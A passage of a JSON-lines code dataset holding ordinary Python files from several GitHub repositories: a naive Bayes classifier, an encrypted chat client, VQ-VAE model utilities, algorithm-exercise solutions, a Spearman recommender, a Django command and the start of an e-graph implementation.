labels for digit \"1\"\n # Calculate the accuracy of predictions for digit \"0\" test data\n accuracy_test0 = calculate_accuracy(predictions_test0, actual_labels_test0)\n # Calculate the accuracy of predictions for digit \"1\" test data\n accuracy_test1 = calculate_accuracy(predictions_test1, actual_labels_test1)\n print(f\"Accuracy for digit 0 test data: {accuracy_test0:.2f}%\")\n print(f\"Accuracy for digit 1 test data: {accuracy_test1:.2f}%\")\n # Checking if the calculated parameters are within acceptable ranges\n params_within_range = all(\n check_within_range(param, target, tolerance)\n for param, target, tolerance in zip(\n feature0_params + feature1_params,\n [mean_feature1_digit0, variance_feature1_digit0, mean_feature2_digit0, variance_feature2_digit0,\n mean_feature1_digit1, variance_feature1_digit1, mean_feature2_digit1, variance_feature2_digit1],\n [0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2]\n )\n )\n # checking if accuracy of predictions are within acceptable ranges\n # Set the target accuracy values for digit 0 and digit 1 test data\n target_accuracy_test0 = accuracy_test0\n target_accuracy_test1 = accuracy_test1\n accuracy_within_range_test0 = check_within_range(accuracy_test0, target_accuracy_test0, 0.005)\n accuracy_within_range_test1 = check_within_range(accuracy_test1, target_accuracy_test1, 0.005)\n if params_within_range:\n print(\"Parameters are within acceptable ranges.\")\n else:\n print(\"Parameters are not within acceptable ranges.\")\n if accuracy_within_range_test0:\n print(f\"Accuracy for digit 0 test data is within acceptable range: {accuracy_test0:.2f}%\")\n else:\n print(f\"Accuracy for digit 0 test data is not within acceptable range: {accuracy_test0:.2f}%\")\n\n if accuracy_within_range_test1:\n print(f\"Accuracy for digit 1 test data is within acceptable range: {accuracy_test1:.2f}%\")\n else:\n print(f\"Accuracy for digit 1 test data is not within acceptable range: {accuracy_test1:.2f}%\")\n pass\nif __name__ == '__main__':\n main()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mobigaurav/cse575-projects","sub_path":"Project1-density-estimation-classification/renamedNB.py","file_name":"renamedNB.py","file_ext":"py","file_size_in_byte":7048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14430450200","text":"import sys\nimport socket\nimport threading\nfrom M2Crypto import RSA\nfrom M2Crypto.BIO import BIOError, MemoryBuffer\nfrom Crypto import Random\nfrom Shared.constants import *\nfrom Shared.constants import ClientMode\nfrom Shared.dhke import DH\nfrom Shared.encrypted_socket import EncryptedSocket\nfrom typing import List, Dict, Optional\nfrom base64 import b64encode, b64decode\n\n\nRSA_KEY_LEN = 2048\nSESSION_SALT_LEN = 16\nSESSION_KEY_LEN = 32\nPRIV_KEY_FILE = 'private_key.pem'\nPUB_KEY_FILE = 'public_key.pem'\n\n\nclass Client:\n\n def __init__(self, server_address: str, port=DEFAULT_PORT):\n\n self.username = None\n self.cookie = None\n self.user_id = None\n self.pub_key = None\n self.requester = Requester(server_address, port)\n self.listener = Listener(server_address, port, self)\n # TODO: generate private key if necessary\n try:\n self.private_key = RSA.load_key(PRIV_KEY_FILE)\n except BIOError:\n print(\"Private key not found :(\")\n self.private_key = None\n\n def stop(self):\n self.listener.connection.close()\n sys.exit()\n\n def login(self, username: str, password: str):\n response = self.requester.request({'action': Action.LOGIN,\n 'username': username,\n 'password': password})\n cookie 
= response.get(\"cookie\")\n user_id = response.get(\"id\")\n if cookie and user_id:\n self.username = username\n self.cookie = cookie\n self.user_id = user_id\n self.pub_key = self.get_public_key(self.user_id)\n else:\n # TODO: Throw exception!\n print(response.get(\"error\"))\n self.listener.send({'cookie': self.cookie}, ClientMode.LISTEN)\n threading.Thread(target=self.listener.listen).start()\n\n def request(self, payload: Dict) -> Dict:\n if self.cookie is not None:\n payload['cookie'] = self.cookie\n return self.requester.request(payload)\n\n def generate_keys(self):\n key = RSA.gen_key(RSA_KEY_LEN, 65537)\n self.private_key = key\n key.save_key(PRIV_KEY_FILE, None)\n key.save_pub_key(PUB_KEY_FILE)\n f = open(PUB_KEY_FILE, 'r')\n public_key = f.read()\n f.close()\n self.requester.request({'action': Action.SET_KEY,\n 'content': public_key,\n 'cookie': self.cookie})\n\n def get_session_key(self, session: int) -> bytes:\n response = self.request({'action': Action.GET_SESSION_KEY, 'session': session})\n encrypted_session_key = response.get('session_key')\n if not encrypted_session_key:\n raise Exception('Session key not found :(')\n return self.decrypt_session_key(encrypted_session_key)\n\n def decrypt_session_key(self, encrypted: str):\n encrypted_bytes = b64decode(encrypted)\n return self.private_key.private_decrypt(encrypted_bytes, RSA.pkcs1_oaep_padding)[SESSION_SALT_LEN:]\n\n def get_sessions(self) -> List:\n response = self.request({'action': Action.GET_SESSIONS})\n return response['sessions']\n\n def get_messages(self, session: int) -> List:\n response = self.request({'action': Action.GET_MESSAGES, 'session': session})\n return response['messages']\n\n @staticmethod\n def load_public_key(pub_key_str: str):\n bio = MemoryBuffer(pub_key_str.encode('utf-8'))\n return RSA.load_pub_key_bio(bio)\n\n def get_public_key(self, user: int) -> Optional[RSA.RSA_pub]:\n response = self.request({'action': Action.GET_PUBLIC_KEY, 'user': user})\n public_key_str = response['public_key']\n return self.load_public_key(public_key_str)\n\n def get_username(self, user: int) -> str:\n response = self.request({'action': Action.GET_USERNAME, 'user': user})\n return response['name']\n\n def create_session(self, members: List[int]):\n session_key = Random.new().read(SESSION_KEY_LEN)\n members_with_keys = []\n for member in members:\n public_key = self.get_public_key(member)\n salt = Random.new().read(SESSION_SALT_LEN)\n encrypted_bytes = public_key.public_encrypt(salt + session_key, RSA.pkcs1_oaep_padding)\n members_with_keys.append((member, b64encode(encrypted_bytes).decode('utf-8')))\n self.request({'action': Action.CREATE_SESSION, 'members': members_with_keys})\n\n def create_account(self, username: str, password: str, fullname: str):\n response = self.request({'action': Action.CREATE_ACCOUNT,\n 'username': username,\n 'password': password,\n 'fullname': fullname})\n print(response)\n self.user_id = response.get('id')\n self.cookie = response.get('cookie')\n self.generate_keys()\n\n\nclass AuthenticationError(Exception):\n\n def __init__(self, *args, **kwargs):\n Exception.__init__(self, *args, **kwargs)\n\n\nclass EncryptedSocketClient(EncryptedSocket):\n\n def __init__(self, connection: socket.socket):\n super().__init__(connection)\n\n def dh(self) -> bytes:\n payload = self.get_plaintext_packet()\n p, g, server_key = payload['p'], payload['g'], payload['pk']\n private_key = DH.gen_private_key()\n public_key = DH.gen_public_key(g, private_key, p)\n self.send({'key': public_key}, ClientMode.DH)\n 
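# classic Diffie-Hellman: combining the server's public key with our private\n # exponent (mod p) yields the same shared secret on both ends of the socket.\n 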
shared_key = DH.get_shared_key(server_key, private_key, p)\n return shared_key\n\n\nclass Requester(EncryptedSocketClient):\n\n def __init__(self, server_address: str, port: int):\n self.server_address = server_address\n self.port = port\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n super().__init__(connection)\n # TODO: do something else here?\n self.connection.close()\n\n def request(self, payload: Dict) -> Dict:\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connection.connect((self.server_address, self.port))\n self.key = self.dh()\n self.send(payload, ClientMode.REQUEST)\n response = self.get_plaintext_packet()\n self.connection.close()\n self.key = None\n return response\n\n\nclass Listener(EncryptedSocketClient):\n\n def __init__(self, server_address: str, port: int, client: Client):\n self.client = client\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((server_address, port))\n super().__init__(connection)\n self.key = self.dh()\n self.interface = None\n\n def set_interface(self, interface):\n self.interface = interface\n\n def listen(self):\n\n while True:\n try:\n payload = self.get_plaintext_packet()\n except ConnectionError:\n print(\"Listener connection lost\")\n return\n if payload['type'] == 'message':\n self.interface.listener_add_msg(payload)\n","repo_name":"spec-sec/SecureChat2","sub_path":"Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"73126336854","text":"from itertools import chain\nimport numpy as np\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch import distributed as dist\n\ndef shift_dim(x, src_dim=-1, dest_dim=-1, make_contiguous=True):\n n_dims = len(x.shape)\n if src_dim < 0:\n src_dim = n_dims + src_dim\n if dest_dim < 0:\n dest_dim = n_dims + dest_dim\n\n assert 0 <= src_dim < n_dims and 0 <= dest_dim < n_dims\n\n dims = list(range(n_dims))\n del dims[src_dim]\n\n permutation = []\n ctr = 0\n for i in range(n_dims):\n if i == dest_dim:\n permutation.append(src_dim)\n else:\n permutation.append(dims[ctr])\n ctr += 1\n x = x.permute(permutation)\n if make_contiguous:\n x = x.contiguous()\n return x\n\ndef view_range(x, i, j, shape):\n shape = tuple(shape)\n\n n_dims = len(x.shape)\n if i < 0:\n i = n_dims + i\n\n if j is None:\n j = n_dims\n elif j < 0:\n j = n_dims + j\n\n assert 0 <= i < j <= n_dims\n\n x_shape = x.shape\n target_shape = x_shape[:i] + shape + x_shape[j:]\n return x.view(target_shape)\n\ndef scaled_dot_product_attention(q, k, v, mask=None, attn_dropout=0., training=True):\n # Performs scaled dot-product attention over the second to last dimension dn\n\n # (b, n_head, d1, ..., dn, d)\n attn = torch.matmul(q, k.transpose(-1, -2))\n attn = attn / np.sqrt(q.shape[-1])\n if mask is not None:\n attn = attn.masked_fill(mask == 0, float('-inf'))\n attn_float = F.softmax(attn, dim=-1)\n attn = attn_float.type_as(attn) # b x n_head x d1 x ... x dn x d\n attn = F.dropout(attn, p=attn_dropout, training=training)\n\n a = torch.matmul(attn, v) # b x n_head x d1 x ... 
x dn x d\n\n return a\n\nclass SamePadConv3d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, bias=True):\n super().__init__()\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size,) * 3\n if isinstance(stride, int):\n stride = (stride,) * 3\n\n # assumes that the input shape is divisible by stride\n total_pad = tuple([k - s for k, s in zip(kernel_size, stride)])\n pad_input = []\n for p in total_pad[::-1]: # reverse since F.pad starts from last dim\n pad_input.append((p // 2 + p % 2, p // 2))\n pad_input = sum(pad_input, tuple())\n self.pad_input = pad_input\n\n self.conv = nn.Conv3d(in_channels, out_channels, kernel_size,\n stride=stride, padding=0, bias=bias)\n\n def forward(self, x):\n return self.conv(F.pad(x, self.pad_input))\n\nclass AxialAttention(nn.Module):\n def __init__(self, n_dim, axial_dim):\n super().__init__()\n if axial_dim < 0:\n axial_dim = 2 + n_dim + 1 + axial_dim\n else:\n axial_dim += 2 # account for batch, head, dim\n self.axial_dim = axial_dim\n\n def forward(self, q, k, v, decode_step, decode_idx):\n q = shift_dim(q, self.axial_dim, -2).flatten(end_dim=-3)\n k = shift_dim(k, self.axial_dim, -2).flatten(end_dim=-3)\n v = shift_dim(v, self.axial_dim, -2)\n old_shape = list(v.shape)\n v = v.flatten(end_dim=-3)\n\n out = scaled_dot_product_attention(q, k, v, training=self.training)\n out = out.view(*old_shape)\n out = shift_dim(out, -2, self.axial_dim)\n return out\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, shape, dim_q, dim_kv, n_head, n_layer,\n causal, attn_type, attn_kwargs):\n super().__init__()\n self.causal = causal\n self.shape = shape\n\n self.d_k = dim_q // n_head\n self.d_v = dim_kv // n_head\n self.n_head = n_head\n\n self.w_qs = nn.Linear(dim_q, n_head * self.d_k, bias=False) # q\n self.w_qs.weight.data.normal_(std=1.0 / np.sqrt(dim_q))\n\n self.w_ks = nn.Linear(dim_kv, n_head * self.d_k, bias=False) # k\n self.w_ks.weight.data.normal_(std=1.0 / np.sqrt(dim_kv))\n\n self.w_vs = nn.Linear(dim_kv, n_head * self.d_v, bias=False) # v\n self.w_vs.weight.data.normal_(std=1.0 / np.sqrt(dim_kv))\n\n self.fc = nn.Linear(n_head * self.d_v, dim_q, bias=True) # c\n self.fc.weight.data.normal_(std=1.0 / np.sqrt(dim_q * n_layer))\n \n self.attn = AxialAttention(len(shape), **attn_kwargs)\n\n self.cache = None\n\n def forward(self, q, k, v, decode_step=None, decode_idx=None):\n \"\"\" Compute multi-head attention\n Args\n q, k, v: a [b, d1, ..., dn, c] tensor or\n a [b, 1, ..., 1, c] tensor if decode_step is not None\n Returns\n The output after performing attention\n \"\"\"\n\n # compute k, q, v\n d_k, d_v, n_head = self.d_k, self.d_v, self.n_head\n q = view_range(self.w_qs(q), -1, None, (n_head, d_k))\n k = view_range(self.w_ks(k), -1, None, (n_head, d_k))\n v = view_range(self.w_vs(v), -1, None, (n_head, d_v))\n\n # b x n_head x seq_len x d\n # (b, *d_shape, n_head, d) -> (b, n_head, *d_shape, d)\n q = shift_dim(q, -2, 1)\n k = shift_dim(k, -2, 1)\n v = shift_dim(v, -2, 1)\n\n # fast decoding\n if decode_step is not None:\n if decode_step == 0:\n if self.causal:\n k_shape = (q.shape[0], n_head, *self.shape, self.d_k)\n v_shape = (q.shape[0], n_head, *self.shape, self.d_v)\n self.cache = dict(k=torch.zeros(k_shape, dtype=k.dtype, device=q.device),\n v=torch.zeros(v_shape, dtype=v.dtype, device=q.device))\n else:\n # cache only once in the non-causal case\n self.cache = dict(k=k.clone(), v=v.clone())\n if self.causal:\n idx = (slice(None, None), slice(None, None), *[slice(i, i+ 1) for i in decode_idx])\n 
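# write this step's key/value slices into the cache at the current decode\n # position, so later steps can attend over everything generated so far.\n 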
self.cache['k'][idx] = k\n self.cache['v'][idx] = v\n k, v = self.cache['k'], self.cache['v']\n\n a = self.attn(q, k, v, decode_step, decode_idx)\n\n # (b, *d_shape, n_head, d) -> (b, *d_shape, n_head * d)\n a = shift_dim(a, 1, -2).flatten(start_dim=-2)\n a = self.fc(a) # (b x seq_len x embd_dim)\n\n return a\n\nclass AxialBlock(nn.Module):\n def __init__(self, n_hiddens, n_head):\n super().__init__()\n kwargs = dict(shape=(0,) * 3, dim_q=n_hiddens,\n dim_kv=n_hiddens, n_head=n_head,\n n_layer=1, causal=False, attn_type='axial')\n self.attn_w = MultiHeadAttention(attn_kwargs=dict(axial_dim=-2),\n **kwargs)\n self.attn_h = MultiHeadAttention(attn_kwargs=dict(axial_dim=-3),\n **kwargs)\n self.attn_t = MultiHeadAttention(attn_kwargs=dict(axial_dim=-4),\n **kwargs)\n\n def forward(self, x):\n x = shift_dim(x, 1, -1)\n x = self.attn_w(x, x, x) + self.attn_h(x, x, x) + self.attn_t(x, x, x)\n x = shift_dim(x, -1, 1)\n return x\n\nclass AttentionResidualBlock(nn.Module):\n def __init__(self, in_channel, n_hiddens):\n super().__init__()\n self.block = nn.Sequential(\n nn.BatchNorm3d(in_channel),\n nn.ReLU(),\n SamePadConv3d(in_channel, n_hiddens, 3, bias=False),\n nn.BatchNorm3d(n_hiddens),\n nn.ReLU(),\n SamePadConv3d(n_hiddens, in_channel, 1, bias=False),\n nn.BatchNorm3d(in_channel),\n nn.ReLU(),\n AxialBlock(in_channel, 2)\n )\n\n def forward(self, x):\n return x + self.block(x)\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channel, channel):\n super().__init__()\n\n self.conv = nn.Sequential(\n nn.ReLU(),\n nn.Conv3d(in_channel, channel, 3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel, in_channel, 1),\n )\n\n def forward(self, input):\n out = self.conv(input)\n out += input\n\n return out\n\nclass Quantizer(nn.Module):\n # Code taken from:\n # https://colab.research.google.com/github/zalandoresearch/pytorch-vq-vae/blob/master/vq-vae.ipynb#scrollTo=fknqLRCvdJ4I\n\n \"\"\"\n EMA-updated Vector Quantizer\n \"\"\"\n def __init__(\n self, num_embeddings, embedding_dim, commitment_cost=0.25, decay=0.99, laplace_alpha=1e-5\n ):\n super(Quantizer, self).__init__()\n\n embed = torch.randn(num_embeddings, embedding_dim)\n self.register_buffer(\"embed\", embed) # e_i\n self.register_buffer(\"embed_avg\", embed.clone()) # m_i\n self.register_buffer(\"cluster_size\", torch.zeros(num_embeddings)) # N_i\n self.register_buffer(\"first_pass\", torch.as_tensor(1))\n\n self.commitment_cost = commitment_cost\n\n self.decay = decay\n self.laplace_alpha = laplace_alpha\n\n self.embedding_dim = embedding_dim\n self.num_embeddings = num_embeddings\n\n def embed_code(self, embed_idx):\n return F.embedding(embed_idx, self.embed)\n\n def _update_ema(self, flat_input, encoding_indices):\n # buffer updates need to be in-place because of distributed\n encodings_one_hot = F.one_hot(\n encoding_indices, num_classes=self.num_embeddings\n ).type_as(flat_input)\n\n new_cluster_size = encodings_one_hot.sum(dim=0)\n dw = encodings_one_hot.T @ flat_input\n\n if torch.distributed.is_initialized():\n torch.distributed.all_reduce(new_cluster_size)\n torch.distributed.all_reduce(dw)\n\n self.cluster_size.data.mul_(self.decay).add_(\n new_cluster_size, alpha=(1-self.decay)\n )\n\n self.embed_avg.data.mul_(self.decay).add_(dw, alpha=(1-self.decay))\n\n # Laplacian smoothing\n n = self.cluster_size.sum()\n cluster_size = n * ( # times n because we don't want probabilities but counts\n (self.cluster_size + self.laplace_alpha)\n / (n + self.num_embeddings * self.laplace_alpha)\n )\n\n embed_normalized = self.embed_avg / 
cluster_size.unsqueeze(dim=-1)\n self.embed.data.copy_(embed_normalized)\n\n def _init_ema(self, flat_input):\n mean = flat_input.mean(dim=0)\n std = flat_input.std(dim=0)\n cluster_size = flat_input.size(dim=0)\n\n if torch.distributed.is_initialized():\n torch.distributed.all_reduce(mean)\n torch.distributed.all_reduce(std)\n mean /= torch.distributed.get_world_size()\n std /= torch.distributed.get_world_size()\n\n cluster_size *= torch.distributed.get_world_size()\n\n self.embed.mul_(std)\n self.embed.add_(mean)\n self.embed_avg.copy_(self.embed)\n\n self.cluster_size.data.add_(cluster_size / self.num_embeddings)\n self.first_pass.mul_(0)\n\n @torch.cuda.amp.autocast(enabled=False)\n def forward(self, inputs):\n inputs = inputs.float()\n with torch.no_grad():\n channel_last = inputs.permute(0, 2, 3, 4, 1) # XXX: might not actually be necessary\n input_shape = channel_last.shape\n\n flat_input = channel_last.reshape(-1, self.embedding_dim)\n\n if self.training and self.first_pass:\n self._init_ema(flat_input)\n\n encoding_indices = torch.argmin(\n torch.cdist(flat_input, self.embed, compute_mode='donot_use_mm_for_euclid_dist')\n , dim=1)\n quantized = self.embed_code(encoding_indices).reshape(input_shape)\n\n if self.training:\n self._update_ema(flat_input, encoding_indices)\n\n # Cast everything back to the same order and dimensions of the input\n quantized = quantized.permute(0, 4, 1, 2, 3)\n encoding_indices = encoding_indices.reshape(input_shape[:-1])\n\n # Don't need to detach quantized; doesn't require grad\n e_latent_loss = F.mse_loss(quantized, inputs)\n loss = self.commitment_cost * e_latent_loss\n\n # Trick to have identity backprop grads\n quantized = inputs + (quantized - inputs).detach()\n\n # don't change this order without checking everything\n return (loss, quantized, encoding_indices)\n\nclass Encoder(nn.Module):\n def __init__(\n self,\n in_channel,\n channel,\n n_res_block,\n n_res_channel,\n stride=2,\n res=ResBlock\n ):\n super().__init__()\n if stride == 4:\n blocks = [\n nn.Conv3d(in_channel, channel // 2, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel // 2, channel, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel, channel, 3, padding=1),\n ]\n\n elif stride == 2:\n blocks = [\n nn.Conv3d(in_channel, channel // 2, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel // 2, channel, 3, padding=1),\n ]\n\n for i in range(n_res_block):\n blocks.append(res(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, data):\n return self.blocks(data)\n\nclass Decoder(nn.Module):\n def __init__(\n self,\n in_channel,\n out_channel,\n channel,\n n_res_block,\n n_res_channel,\n stride=2,\n res=ResBlock\n ):\n super().__init__()\n blocks = [nn.Conv3d(in_channel, channel, 3, padding=1)]\n\n for i in range(n_res_block):\n blocks.append(res(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n if stride == 4:\n blocks.extend(\n [\n nn.ConvTranspose3d(channel, channel // 2, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose3d(\n channel // 2, out_channel, 4, stride=2, padding=1\n ),\n ]\n )\n\n elif stride == 2:\n blocks.append(\n nn.ConvTranspose3d(channel, out_channel, 4, stride=2, padding=1)\n )\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, input):\n return self.blocks(input)\n\nclass MyQuantize(nn.Module):\n def __init__(self, n_embed, dim, decay=0.99, eps=1e-5):\n super().__init__()\n\n self.dim 
= dim\n self.n_embed = n_embed\n self.decay = decay\n self.eps = eps\n\n embed = torch.randn(dim, n_embed)\n self.register_buffer(\"embed\", embed)\n self.register_buffer(\"cluster_size\", torch.zeros(n_embed))\n self.register_buffer(\"embed_avg\", embed.clone())\n\n def get_world_size(self):\n if not dist.is_available():\n return 1\n\n if not dist.is_initialized():\n return 1\n\n return dist.get_world_size()\n\n def all_reduce(self, tensor, op=dist.ReduceOp.SUM):\n world_size = self.get_world_size()\n\n if world_size == 1:\n return tensor\n\n dist.all_reduce(tensor, op=op)\n return tensor\n\n def forward(self, input):\n flatten = input.reshape(-1, self.dim)\n # note: this local name shadows the module-level dist (torch.distributed) import\n dist = (\n flatten.pow(2).sum(1, keepdim=True)\n - 2 * flatten @ self.embed\n + self.embed.pow(2).sum(0, keepdim=True)\n )\n _, embed_ind = (-dist).max(1)\n embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)\n embed_ind = embed_ind.view(*input.shape[:-1])\n quantize = self.embed_code(embed_ind)\n\n if self.training:\n embed_onehot_sum = embed_onehot.sum(0)\n embed_sum = flatten.transpose(0, 1) @ embed_onehot\n\n self.all_reduce(embed_onehot_sum)\n self.all_reduce(embed_sum)\n\n self.cluster_size.data.mul_(self.decay).add_(\n embed_onehot_sum, alpha=1 - self.decay\n )\n self.embed_avg.data.mul_(self.decay).add_(embed_sum, alpha=1 - self.decay)\n n = self.cluster_size.sum()\n cluster_size = (\n (self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n\n )\n embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)\n self.embed.data.copy_(embed_normalized)\n\n diff = (quantize.detach() - input).pow(2).mean()\n quantize = input + (quantize - input).detach()\n\n return quantize, diff, embed_ind\n\n def embed_code(self, embed_id):\n return F.embedding(embed_id, self.embed.transpose(0, 1))","repo_name":"julschoen/3D-VAE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22573591607","text":"from collections import deque\n\n\ndef solution(n, edge):\n answer = 0\n visited = [-1] * (n + 1)\n graph = [[] for _ in range(n + 1)]\n for a, b in edge:\n graph[a].append(b)\n graph[b].append(a)\n \n q = deque()\n\n q.append(1)\n visited[1] = 0\n\n while q:\n num = q.popleft()\n for i in graph[num]:\n if visited[i] == -1:\n visited[i] = visited[num] + 1\n q.append(i)\n \n maxVal = max(visited)\n\n for i in range(1, len(visited)):\n if visited[i] == maxVal:\n answer += 1\n\n return answer\n\n","repo_name":"jjiwoning/Code_Test","sub_path":"python_algo/Programmers/far_node.py","file_name":"far_node.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6331554349","text":"# gut feeling: scanning people from the left and feeding each one the leftmost hamburger still in reach should work\nn, k = map(int,input().split())\narr = list(input().rstrip())\nresult = 0\nfor i in range(n):\n if arr[i] == 'P':\n for j in range(max(i-k,0),min(i+k+1,n)):\n if arr[j] == 'H':\n result += 1\n arr[j] = 'X'\n break\nprint(result)","repo_name":"cksdud150/HTG","sub_path":"10_1/19941.py","file_name":"19941.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34823200447","text":"import sys\nimport math\nfrom predictor import Predictor, compute_weighted_average, compute_mean, clean_user\nimport collections\nfrom heapq import heappush, heappop\n\nclass 
Spearman(Predictor):\n\tdef __init__(self):\n\t\tself.user_data = None\n\n\tdef train(self, user_data):\n\t\tself.user_data = user_data\n\n\tdef predict(self, user_num, user_set, num_neighbors):\n\t\t#Make sure you hide the training data on the values in the user_set\n\t\tprediction_set = {}\n\t\tuser_pre_clean = self.user_data[user_num]\n\t\tuser_post_clean = clean_user(user_pre_clean, user_set)\n\t\t#user_post_clean contains all the values for a user not in our prediction set\n\t\tsimilarity_to_user = []\n\t\t#generate relevant subset\n\t\tfor user_v in self.user_data:\n\t\t\t# exclude current user\n\t\t\tif user_v != user_num:\n\t\t\t\tsimilarity = self.calculate_spearman_similarity(user_post_clean, self.user_data[user_v])\n\t\t\t\tsimilarity_to_user.append((similarity, self.user_data[user_v]))\n\t\tsimilarity_to_user.sort(key=lambda x: x[0], reverse=True)\n\t\tfor movie in user_set:\n\t\t\tprediction = compute_weighted_average(user_post_clean, similarity_to_user, movie, num_neighbors)\n\t\t\tif prediction > 5.0:\n\t\t\t\tprediction = 5.0\n\t\t\telif prediction < 0.5:\n\t\t\t\tprediction = 0.5\n\t\t\tprediction_set[movie] = prediction\n\t\treturn collections.OrderedDict(sorted(prediction_set.items()))\n\n\tdef calculate_spearman_similarity(self, u, v):\n\t\t#generate intersection subset\n\t\tintersection = []\n\t\tfor movie in u:\n\t\t\tif movie in v:\n\t\t\t\tintersection.append(movie)\n\t\tif len(intersection) == 0:\n\t\t\treturn 0\n\n\t\tmovie_ranks_u = {}\n\t\tmovie_ranks_v = {}\n\n\t\tindex = 0.5\n\t\twhile index <= 5.0:\n\t\t\tmovie_ranks_u[index] = 0\n\t\t\tmovie_ranks_v[index] = 0\n\t\t\tindex += 0.5\n\n\t\tfor movie in intersection:\n\t\t\tmovie_ranks_u[u[movie]] += 1\n\t\t\tmovie_ranks_v[v[movie]] += 1\n\n\t\tlist_of_u_ranks = []\n\t\tlist_of_v_ranks = []\n\t\tstarting_rank_u = 1.0\n\t\tstarting_rank_v = 1.0\n\n\t\tindex = 5.0\n\t\twhile index >= 0.5:\n\t\t\tin_block = movie_ranks_u[index]\n\t\t\tif in_block != 0:\n\t\t\t\t# tied ratings share the average of the rank positions they occupy\n\t\t\t\tending_rank = starting_rank_u + in_block - 1\n\t\t\t\tavg_rank = (starting_rank_u + ending_rank) / 2\n\t\t\t\tfor i in range(in_block):\n\t\t\t\t\tlist_of_u_ranks.append(avg_rank)\n\t\t\t\tstarting_rank_u += in_block\n\t\t\tindex -= 0.5\n\n\t\tindex = 5.0\n\t\twhile index >= 0.5:\n\t\t\tin_block = movie_ranks_v[index]\n\t\t\tif in_block != 0:\n\t\t\t\t# tied ratings share the average of the rank positions they occupy\n\t\t\t\tending_rank = starting_rank_v + in_block - 1\n\t\t\t\tavg_rank = (starting_rank_v + ending_rank) / 2\n\t\t\t\tfor i in range(in_block):\n\t\t\t\t\tlist_of_v_ranks.append(avg_rank)\n\t\t\t\tstarting_rank_v += in_block\n\t\t\tindex -= 0.5\n\n\t\tmean_u = compute_mean_spearman(list_of_u_ranks)\n\t\tmean_v = compute_mean_spearman(list_of_v_ranks)\n\n\t\tnumerator = 0.0\n\t\tdenominator = 0.0\n\t\t#compute numerator\n\t\tfor i in range(len(intersection)):\n\t\t\tnumerator += (list_of_u_ranks[i] - mean_u) * (list_of_v_ranks[i] - mean_v)\n\n\t\t#compute denominator\n\t\tterm1 = 0.0\n\t\tterm2 = 0.0\n\t\tfor i in range(len(intersection)):\n\t\t\tterm1 += math.pow(list_of_u_ranks[i] - mean_u, 2)\n\t\t\tterm2 += math.pow(list_of_v_ranks[i] - mean_v, 2)\n\t\tdenominator = math.sqrt(term1 * term2)\n\n\t\tif denominator == 0:\n\t\t\treturn 0.0\n\t\treturn numerator / denominator\n\ndef compute_mean_spearman(list_of_u_ranks):\n\tsum_u = 0.0\n\tfor rank in list_of_u_ranks:\n\t\tsum_u += rank\n\treturn sum_u / 
len(list_of_u_ranks)\n\n","repo_name":"0xnirmal/Collaborative-Filtering-Recommendation-Engine","sub_path":"Code/spearman.py","file_name":"spearman.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"23820110710","text":"from django.core.management.base import BaseCommand\nfrom courses.models import Student, Test\n\n\nclass Command(BaseCommand):\n help = 'List of students with the number of classes they have taken'\n\n def handle(self, *args, **options):\n students = Student.objects.select_related('user')\n tests = Test.objects.select_related('student')\n student_dict = {}\n\n for student in students:\n student_dict[student.user.username] = 0\n for student in tests:\n if student.testing:\n if student.student.user.username in student_dict.keys():\n student_dict[student.student.user.username] += 1\n\n print(student_dict)\n","repo_name":"IrynaMazaieva/Django","sub_path":"Education/courses/management/commands/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32314517385","text":"from collections import namedtuple, defaultdict\nfrom disjoint_set import DisjointSet\nimport itertools\n\n'''\nSimple (non-performant) implementation of \n egg: fast and extensible equality saturation\n https://dl.acm.org/doi/pdf/10.1145/3434304\n'''\n\nENode = namedtuple('Enode', ['op', 'operands'])\n\nclass Pattern:\n def __init__(self, op, *sub_patterns):\n self.op = op\n self.sub_patterns = sub_patterns\n self.is_leaf = not sub_patterns\n\n def get_sub_pattern(self, i):\n '''\n ### interface\n id -> Pattern\n '''\n return self.sub_patterns[i]\n\n def get_live_in(self):\n '''\n ### interface\n '''\n assert self.is_leaf\n return self.op\n\n def match_local(self, n):\n '''\n ### interface\n '''\n return self.op == n.op or self.is_leaf\n\n def apply(self, egraph, subst):\n if self.is_leaf:\n x = self.get_live_in()\n if x in subst:\n return 